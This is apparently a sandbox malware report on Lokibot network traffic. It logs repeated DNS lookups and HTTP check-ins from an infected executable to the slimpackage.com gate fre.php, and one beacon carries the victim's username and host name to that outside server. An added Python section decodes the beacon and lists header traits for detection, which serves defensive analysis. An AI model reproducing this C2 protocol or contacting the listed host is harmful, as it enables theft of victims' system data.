Jan 14, 2022 09:25:42.948643923 CET | 192.168.2.3 | 8.8.8.8 | 0xb5ae | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:44.363774061 CET | 192.168.2.3 | 8.8.8.8 | 0x248 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:45.760132074 CET | 192.168.2.3 | 8.8.8.8 | 0x1f60 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:47.734616995 CET | 192.168.2.3 | 8.8.8.8 | 0x912c | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:49.878865957 CET | 192.168.2.3 | 8.8.8.8 | 0x6f7d | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:53.184317112 CET | 192.168.2.3 | 8.8.8.8 | 0xc54 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:55.338282108 CET | 192.168.2.3 | 8.8.8.8 | 0xd91 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:57.269567966 CET | 192.168.2.3 | 8.8.8.8 | 0x5513 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:01.674140930 CET | 192.168.2.3 | 8.8.8.8 | 0x1d22 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:03.396339893 CET | 192.168.2.3 | 8.8.8.8 | 0x3670 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:04.867762089 CET | 192.168.2.3 | 8.8.8.8 | 0x4f3e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:06.348675013 CET | 192.168.2.3 | 8.8.8.8 | 0xef44 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:07.753612041 CET | 192.168.2.3 | 8.8.8.8 | 0xb245 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:09.111833096 CET | 192.168.2.3 | 8.8.8.8 | 0x2e09 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.694483995 CET | 192.168.2.3 | 8.8.8.8 | 0x77b5 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:12.039196014 CET | 192.168.2.3 | 8.8.8.8 | 0x7a04 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:13.663563013 CET | 192.168.2.3 | 8.8.8.8 | 0x15d2 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:15.080522060 CET | 192.168.2.3 | 8.8.8.8 | 0xdbbc | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:16.596752882 CET | 192.168.2.3 | 8.8.8.8 | 0x83bf | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 09:24:21.041994095 CET | 8.8.8.8 | 192.168.2.3 | 0x789f | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:22.866626978 CET | 8.8.8.8 | 192.168.2.3 | 0x22ad | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:24.491199017 CET | 8.8.8.8 | 192.168.2.3 | 0xba3 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:25.866981983 CET | 8.8.8.8 | 192.168.2.3 | 0x2a61 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:27.286494970 CET | 8.8.8.8 | 192.168.2.3 | 0xbe4f | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:29.115494967 CET | 8.8.8.8 | 192.168.2.3 | 0x80ee | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:31.216502905 CET | 8.8.8.8 | 192.168.2.3 | 0x5133 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:32.714936018 CET | 8.8.8.8 | 192.168.2.3 | 0xa9f0 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:34.113398075 CET | 8.8.8.8 | 192.168.2.3 | 0xb702 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:35.592550993 CET | 8.8.8.8 | 192.168.2.3 | 0xc19a | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:36.901443005 CET | 8.8.8.8 | 192.168.2.3 | 0x7f02 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:38.296339035 CET | 8.8.8.8 | 192.168.2.3 | 0x2de0 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:40.886985064 CET | 8.8.8.8 | 192.168.2.3 | 0xdba5 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:43.636513948 CET | 8.8.8.8 | 192.168.2.3 | 0xcbec | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:46.252554893 CET | 8.8.8.8 | 192.168.2.3 | 0x18f2 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:49.035787106 CET | 8.8.8.8 | 192.168.2.3 | 0xf39f | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:50.684350014 CET | 8.8.8.8 | 192.168.2.3 | 0xf7c | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:53.376399994 CET | 8.8.8.8 | 192.168.2.3 | 0xc6cb | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:54.670542955 CET | 8.8.8.8 | 192.168.2.3 | 0x7b32 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:56.458235979 CET | 8.8.8.8 | 192.168.2.3 | 0x1025 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:58.357232094 CET | 8.8.8.8 | 192.168.2.3 | 0x8a91 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:00.367105961 CET | 8.8.8.8 | 192.168.2.3 | 0xa699 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:02.045928001 CET | 8.8.8.8 | 192.168.2.3 | 0x64a4 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:04.691482067 CET | 8.8.8.8 | 192.168.2.3 | 0x1fdc | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:07.216022968 CET | 8.8.8.8 | 192.168.2.3 | 0x732b | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:08.799689054 CET | 8.8.8.8 | 192.168.2.3 | 0x50d5 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:10.773690939 CET | 8.8.8.8 | 192.168.2.3 | 0xb1d8 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:12.312412024 CET | 8.8.8.8 | 192.168.2.3 | 0xdff | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:13.749931097 CET | 8.8.8.8 | 192.168.2.3 | 0xe76e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:17.037441015 CET | 8.8.8.8 | 192.168.2.3 | 0xd636 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:20.125149012 CET | 8.8.8.8 | 192.168.2.3 | 0x3f01 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:24.272874117 CET | 8.8.8.8 | 192.168.2.3 | 0x2fa3 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:27.282341003 CET | 8.8.8.8 | 192.168.2.3 | 0xa16a | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:32.654656887 CET | 8.8.8.8 | 192.168.2.3 | 0x1f06 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:35.481163979 CET | 8.8.8.8 | 192.168.2.3 | 0x3be0 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:37.817436934 CET | 8.8.8.8 | 192.168.2.3 | 0x99c0 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:40.063594103 CET | 8.8.8.8 | 192.168.2.3 | 0xead | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:42.968004942 CET | 8.8.8.8 | 192.168.2.3 | 0xb5ae | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:44.381669998 CET | 8.8.8.8 | 192.168.2.3 | 0x248 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:45.777311087 CET | 8.8.8.8 | 192.168.2.3 | 0x1f60 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:47.753484011 CET | 8.8.8.8 | 192.168.2.3 | 0x912c | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:49.898205996 CET | 8.8.8.8 | 192.168.2.3 | 0x6f7d | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:53.204303026 CET | 8.8.8.8 | 192.168.2.3 | 0xc54 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:55.357494116 CET | 8.8.8.8 | 192.168.2.3 | 0xd91 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:57.287251949 CET | 8.8.8.8 | 192.168.2.3 | 0x5513 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:01.693149090 CET | 8.8.8.8 | 192.168.2.3 | 0x1d22 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:03.415883064 CET | 8.8.8.8 | 192.168.2.3 | 0x3670 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:04.887339115 CET | 8.8.8.8 | 192.168.2.3 | 0x4f3e | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:06.367301941 CET | 8.8.8.8 | 192.168.2.3 | 0xef44 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:07.772936106 CET | 8.8.8.8 | 192.168.2.3 | 0xb245 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:09.131659985 CET | 8.8.8.8 | 192.168.2.3 | 0x2e09 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:10.713933945 CET | 8.8.8.8 | 192.168.2.3 | 0x77b5 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:12.058365107 CET | 8.8.8.8 | 192.168.2.3 | 0x7a04 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:13.683290958 CET | 8.8.8.8 | 192.168.2.3 | 0x15d2 | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:15.100056887 CET | 8.8.8.8 | 192.168.2.3 | 0xdbbc | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 09:26:16.615869999 CET | 8.8.8.8 | 192.168.2.3 | 0x83bf | No error (0) | slimpackage.com | | 104.223.93.105 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• slimpackage.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49743 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 09:24:21.210021973 CET | 1028 | OUT | POST /slimmain/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: slimpackage.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: CC3B1AE
    Content-Length: 190
    Connection: close
Jan 14, 2022 09:24:21.478250980 CET | 1029 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 14 Jan 2022 08:24:20 GMT
    Server: Apache
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49744 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 09:24:22.998234034 CET | 1029 | OUT | POST /slimmain/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: slimpackage.com
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: CC3B1AE
    Content-Length: 190
    Connection: close
Jan 14, 2022 09:24:23.255940914 CET | 1030 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 14 Jan 2022 08:24:22 GMT
    Server: Apache
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    10 | 192.168.2.3 | 49753 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:37.035382032 CET | 1138 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:37.315669060 CET | 1139 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:36 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    11 | 192.168.2.3 | 49754 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:38.459969044 CET | 1140 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:38.799472094 CET | 1140 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    12 | 192.168.2.3 | 49755 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:41.014482975 CET | 1146 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:41.266432047 CET | 1164 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:40 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    13 | 192.168.2.3 | 49758 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:43.765625000 CET | 1165 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:44.023281097 CET | 1165 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    14 | 192.168.2.3 | 49759 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:46.465908051 CET | 1166 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:46.803215981 CET | 1167 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    15 | 192.168.2.3 | 49760 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:49.164146900 CET | 1168 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:49.421993971 CET | 1168 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:48 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    16 | 192.168.2.3 | 49761 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:50.858341932 CET | 1169 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:51.892734051 CET | 1170 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 09:24:52.023314953 CET | 1170 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:51 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.
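
The 163-byte request body captured in session 16 is the bot's check-in, and the request head it travels in is identical across every session above. As an added example (not from the report or from the sandbox tooling), the Python below decodes that body into its fields and lists the request-head traits that a network rule for this family would match. Field names follow public analyses of the Lokibot 1.8 packet format rather than anything the report states; the two host strings after the username, the three 16-bit flags and the two 32-bit values after the screen size are marked as assumptions in the code, and the sample bytes and request text are constructed copies of the lines shown above.

```python
import re
import struct

# Check-in body from session 16 above, copied from the report's "Data Raw"
# line (163 bytes, the request's Content-Length). Constructed test input.
BEACON_HEX = (
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 "
    "35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 "
    "2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 "
    "01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 "
    "39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 "
    "32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00"
)
BEACON = bytes.fromhex(BEACON_HEX)

# Request head seen in every session above (constructed copy of the report's
# request lines; BEACON would be the body that follows it).
CAPTURED_REQUEST = (
    "POST /slimmain/five/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: slimpackage.com\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: CC3B1AE\r\n"
    "Content-Length: 163\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def _read_string(buf, off):
    """String record: u16 wide flag, u32 byte length, then the bytes."""
    wide, length = struct.unpack_from("<HI", buf, off)
    off += 6
    raw = buf[off:off + length]
    if len(raw) != length:
        raise ValueError("truncated string record at offset %d" % off)
    text = raw.decode("utf-16-le") if wide == 1 else raw.decode("latin-1")
    return text, off + length


def parse_lokibot_beacon(buf):
    """Decode the check-in body. Layout per public Lokibot 1.8 analyses
    (assumption): u16 version, u32 packet type, length-prefixed binary ID,
    username, two host strings, screen width/height, three u16 flags,
    two u32 OS-related values, then the 24-character bot ID."""
    version, ptype = struct.unpack_from("<HI", buf, 0)
    off = 6
    (id_len,) = struct.unpack_from("<I", buf, off)
    off += 4
    binary_id = buf[off:off + id_len].decode("ascii")
    off += id_len
    username, off = _read_string(buf, off)
    host_a, off = _read_string(buf, off)   # computer name / domain: order assumed
    host_b, off = _read_string(buf, off)
    tail = "<IIHHHII"                      # width, height, 3 flags, 2 values
    width, height, f1, f2, f3, v1, v2 = struct.unpack_from(tail, buf, off)
    off += struct.calcsize(tail)
    bot_id, off = _read_string(buf, off)   # also used as the mutex name (public write-ups)
    return {"version": version, "type": ptype, "binary_id": binary_id,
            "username": username, "host_strings": (host_a, host_b),
            "screen": (width, height), "flags": (f1, f2, f3),
            "os_fields": (v1, v2), "bot_id": bot_id, "consumed": off}


def lokibot_http_indicators(request_text):
    """Return the Lokibot C2 traits present in an HTTP request head.
    The combination, not any single header, is what makes a match reliable."""
    head = request_text.split("\r\n\r\n", 1)[0]
    request_line, _, header_block = head.partition("\r\n")
    headers = {}
    for line in header_block.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    hits = []
    if re.match(r"POST \S+\.php HTTP/1\.0$", request_line):
        hits.append("HTTP/1.0 POST to a .php gate")
    if headers.get("user-agent") == "Mozilla/4.08 (Charon; Inferno)":
        hits.append("Charon/Inferno user-agent")
    if headers.get("content-encoding") == "binary":
        hits.append("Content-Encoding: binary")
    if "content-key" in headers:
        hits.append("non-standard Content-Key header")
    return hits


if __name__ == "__main__":
    print(lokibot_http_indicators(CAPTURED_REQUEST))
    for key, value in parse_lokibot_beacon(BEACON).items():
        print("%-12s %r" % (key, value))
```

Running it against the captured bytes yields the username, the two host strings, a 1280x1024 screen and the bot ID 8F9C4E9C79A3B52B3F739430 that the report's Data Ascii line shows run together; the parser also confirms that the body is consumed exactly at byte 163, which is the cheapest sanity check that the assumed layout fits this sample. The 8-byte prefix on the C2's "File not found." replies is left undecoded here because the report gives no basis for its meaning.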


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    17 | 192.168.2.3 | 49762 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:53.504302025 CET | 1171 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:53.758002996 CET | 1172 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    18 | 192.168.2.3 | 49763 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:54.799105883 CET | 1172 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:55.056551933 CET | 1173 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:53 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    19 | 192.168.2.3 | 49764 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:56.589623928 CET | 1174 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:56.896958113 CET | 1174 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:55 GMT
                    Server: Apache
                    Connection: close
